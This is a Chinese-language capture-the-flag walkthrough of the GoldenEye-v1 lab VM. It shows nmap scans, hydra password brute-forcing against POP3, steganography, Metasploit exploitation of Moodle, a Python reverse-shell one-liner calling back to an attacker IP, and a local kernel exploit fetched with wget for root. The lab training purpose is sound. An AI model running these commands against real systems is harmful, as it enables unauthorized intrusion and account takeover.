【第一个项目】GoldenEye-v1
Before hack
靶机环境准备:https://cloud.189.cn/t/EZfQVfa2YNnm 访问码:om4x
点击文件自动vmware启动
Hack it
nmap端口扫描
首先要先发现这台机器的IP地址
查看本机ifconfig信息,查看ip地址,本机与靶机处于统一网段。
nmap扫一下本网段存活的IP地址。
扫出来的有域名,说明就是这个靶机。
继续信息搜集,进行端口扫描。
80端口开放的是http服务。
直接访问
按照他给的目录登陆,发现需要登陆
需要爆破密码,回去右键查看源码,看到terminal.js,有一下信息。
将InvincibleHack3rhtml解码得到
InvincibleHack3r
密码爆破
并且这段文字中还有两个人名,Boris,Natalya,试试登陆。用户名首字母大写就不行,要试试小写。
最终,boris,InvincibleHack3r为最终解。
其中有一句:
但是在端口扫描的时候并没有看到pop3服务。
那么我们进行一下nmap -p-
全端口扫描。
扫出两个未知端口
然后再用nmap探测底层的详细的信息
nmap -p55006,55007 ip -sS -sV -A -T5
hydra
上面还提示着用着密码登陆,我们可以使用hydra进行登陆破解
hydra -L 1.txt -P /usr/share/wordlists/fasttrack.txt 192.168.137.32 -s 55007 pop3
-l是文本
-L 指定文本里面的用户,- P指的是字典文件 ,-s指的是端口,最后是服务。
echo -e 'boris\nnatalya' >1.txt
使用命令,将这两个人名放进去。
启功九头蛇!
爆破出natalya的密码是bird
NC登陆
nc 192.168.137.32 55007 ------登陆邮箱
user boris ------登陆用户
pass secret1! ------登陆密码
list ------查看邮件信息
retr 1~3 ------查看邮件信息
登陆进natalya的邮箱,有两封邮件
查看第一个
似乎没啥用
查看第二个
浅浅翻译了一下,
好的,Natalyn,我有一个新学生给你。由于这是一个新系统,如果你看到任何配置问题,请让我或boris知道,特别是它与安全有关。。。即使不是,也只是打着“安全”的幌子进入。。。它将使变更单升级,而不需要太多麻烦:)好的,
用户信誉是:用户名:xenia
密码:RCP90rulez!
Boris验证了她是一个有效的承包商,所以只需创建帐户即可,好吗?
如果你在内部域名之外没有URL:severnaya-station.com/gnocertdir
**确保编辑您的主机文件,因为您通常在网络外远程工作。。。。
由于您是Linux用户,只需将此服务器IP指向/etc/hosts中的severnaya-station.com即可。
那么就修改一下host文件吧
直接访问那个url,长这个样子
CMS
直接用上面的密码尝试登陆
成功进入
结合开头看到的moodle,可以知道这是一个开源的CMS,2.2.3为版本
结合whatweb指纹识别,有了更多的信息。
获得了另外一个人名doak,继续爆破它的密码
得到doak的密码是goat
继续nc查看它的邮箱,只有一条,查看一下
给了用户名和密码
图片隐写(binwalk,exiftool)
回到网页,用此登陆!
成功登陆
然而,并没有发现什么信息。在home的右面能看见一个文件,打开看看
访问这个图片
显然是隐写,检查一下图片内容,用wget下载图片到当前文件夹
先尝试用binwalk
分离一下
分离出两个文件
用exiftool
(图虫)查看图片详细信息
其中的description,base64解码后是xWinter1995x!
strings会将其变成ASCII码
回到之前,可以知道它是admin的密码,登陆网页尝试,成功登陆admin的账户
、
MSF get shell
Moole 2.2.3 exp cve ---> CVE-2013-3630 漏洞可利用 29324 https://nvd.nist.gov/vuln/detail/CVE-2013-3630
此版本有很多漏洞利用,由于我们需要在目标计算机上进行外壳访问,因此我选择远程代码执行漏洞(RCE)漏洞进行利用.
MSF启动
msfconsole
进入MSF
search moodle 查找moodle类型的攻击模块
use 直接+上面的编号就行,show options
显示条件
成功!注意要更改cms里面的powershell设置。如下:
安装了python
提权
python -c 'import pty; pty.spawn("/bin/bash")' ---将shell进行tty
获得交互shell,
提权的话一定要到tmp目录下才能进行提权。
回到网页,发现另外一个地方有执行命令的地方。这是第二个拿shell的方法。
利用python的反弹shell
python反弹shell
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.137.111",6666));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' 注意地址和端口需要改
先在本机开启监听
填上你的上面的python代码,并且记得保存!
点击这个触发
监听得到回显。同样建立tty
输入命令uname -a
:显示系统名、节点名称、操作系统的发行版号、内核版本等等。
找到exp,id37292
这是具体的步骤,要求有gcc(可以用cc代替)
有gcc,那么可以直接用。
search 37292
kali搜索下:
searchsploit 37292 ---搜索kali本地的exp库中37292攻击脚本信息
cp /usr/share/exploitdb/exploits/linux/local/37292.c /root/桌面/ ---目录自行修改
可以直接看到,复制到桌面后,更改其中的gcc命令为cc
在本文件夹创建了一个简短的http服务。
可以知道有wget,那么直接把文件下载到目标主机上
GET FLAG
成功下载后执行cc编译:
cc -o exp 37292.c ---C语言的CC代码编译点c文件
chmod +x exp ---编译成可执行文件,并赋权
./exp ---点杠执行
id ---查看目前权限
看到root就是执行成功。
ls /root,为空。可能是隐藏文件。用ls -al查看隐藏文件
最终用cat命令得到flag!